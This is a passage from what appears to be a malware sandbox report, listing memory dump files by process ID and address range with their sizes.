          • memory/1716-220-0x0000000000470000-0x0000000000471000-memory.dmp

            Filesize

            4KB

          • memory/1716-498-0x0000000002020000-0x0000000002042000-memory.dmp

            Filesize

            136KB

          • memory/1716-572-0x0000000002020000-0x0000000002042000-memory.dmp

            Filesize

            136KB

          • memory/1716-573-0x0000000003ED0000-0x0000000003F08000-memory.dmp

            Filesize

            224KB

          • memory/2148-426-0x000000001006B000-0x000000001062F000-memory.dmp

            Filesize

            5.8MB

          • memory/2352-417-0x0000000010000000-0x0000000010F95000-memory.dmp

            Filesize

            15.6MB

          • memory/2352-347-0x0000000010000000-0x0000000010F95000-memory.dmp

            Filesize

            15.6MB

          • memory/3460-429-0x000000001006B000-0x000000001062F000-memory.dmp

            Filesize

            5.8MB

          • memory/4372-422-0x0000000010000000-0x0000000010F95000-memory.dmp

            Filesize

            15.6MB

          • memory/4372-418-0x0000000010000000-0x0000000010F95000-memory.dmp

            Filesize

            15.6MB

          • memory/4372-380-0x0000000010000000-0x0000000010F95000-memory.dmp

            Filesize

            15.6MB

          • memory/4640-381-0x0000000010000000-0x0000000010F95000-memory.dmp

            Filesize

            15.6MB

          • memory/4640-419-0x0000000010001000-0x000000001001E000-memory.dmp

            Filesize

            116KB

          • memory/4640-421-0x0000000010000000-0x0000000010F95000-memory.dmp

            Filesize

            15.6MB

          • memory/4692-412-0x0000000010000000-0x0000000010F95000-memory.dmp

            Filesize

            15.6MB

          • memory/4692-246-0x0000000010000000-0x0000000010F95000-memory.dmp

            Filesize

            15.6MB

          • memory/4692-219-0x0000000000430000-0x0000000000431000-memory.dmp

            Filesize

            4KB

          • memory/4824-425-0x000000001006B000-0x000000001062F000-memory.dmp

            Filesize

            5.8MB